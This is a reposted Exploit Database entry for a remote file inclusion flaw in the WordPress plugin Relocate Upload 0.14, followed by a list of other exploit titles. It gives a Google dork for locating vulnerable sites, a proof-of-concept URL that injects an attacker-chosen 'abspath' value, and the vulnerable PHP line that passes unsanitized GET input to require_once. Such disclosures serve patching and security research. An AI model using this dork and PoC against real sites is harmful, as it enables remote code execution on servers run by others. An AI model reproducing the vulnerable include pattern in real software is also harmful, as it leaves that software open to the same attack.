WordPress Plugin Relocate Upload 0.14 – Remote File Inclusion

Exploit Database
89 阅读

作者： Ben Schmidt

日期： 2011-09-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17869/

# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('WP_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

last Exploits
WordPress Plugin Relocate Upload 0.14 – Remote File Inclusion的更多信息

WordPress Plugin Appointment Booking Calendar 1.3.34 – CSV Injection：
Newsportal 0.37 – ‘post.php’ Cross-Site Scripting：
Anuko Time Tracker 1.19.23.5325 – CSV/Formula Injection：
Quadz School Management System 3.1 – ‘uisd’ SQL Injection：
evalSMSI 2.1.3 – Multiple Input Validation Vulnerabilities：
WordPress Plugin RokMicroNews – ‘thumb.php’ Multiple Vulnerabilities：
e107 CMS 0.7.19 – Cross-Site Request Forgery：
Groupon Clone Script 3.01 – ‘state_id’ / ‘search’ SQL Injection：